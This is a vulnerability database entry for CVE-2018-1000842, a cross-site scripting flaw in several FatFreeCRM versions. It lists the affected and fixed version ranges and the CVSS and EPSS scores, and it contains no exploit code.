cbcvebase.
CVE-2018-1000842
published 2018-12-20

CVE-2018-1000842: FatFreeCRM version =0.15.0 =0.16.0 =0.17.0 <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit…

PriorityP427medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EPSS
1.69%
74.2th percentile
FatFreeCRM version =0.15.0 =0.16.0 =0.17.0 <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit 6d60bc8ed010c4eda05d6645c64849f415f68d65 that can result in Javascript execution. This attack appear to be exploitable via Content with Javascript payload will be executed on end user browsers when they visit the page. This vulnerability appears to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2, 0.14.2.

Affected

10 ranges
VendorProductVersion rangeFixed in
fatfreecrmfat_free_crm>= 0 < 0.14.20.14.2
fatfreecrmfat_free_crm>= 0.15.0 < 0.15.20.15.2
fatfreecrmfat_free_crm>= 0.16.0 < 0.16.40.16.4
fatfreecrmfat_free_crm>= 0.17.0 < 0.17.30.17.3
fatfreecrmfat_free_crm>= 0.18.0 < 0.18.10.18.1
fatfreecrmfatfreecrm<= 0.14.1
fatfreecrmfatfreecrm
fatfreecrmfatfreecrm0.15.0 – 0.15.1
fatfreecrmfatfreecrm0.16.0 – 0.16.3
fatfreecrmfatfreecrm0.17.0 – 0.17.2

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.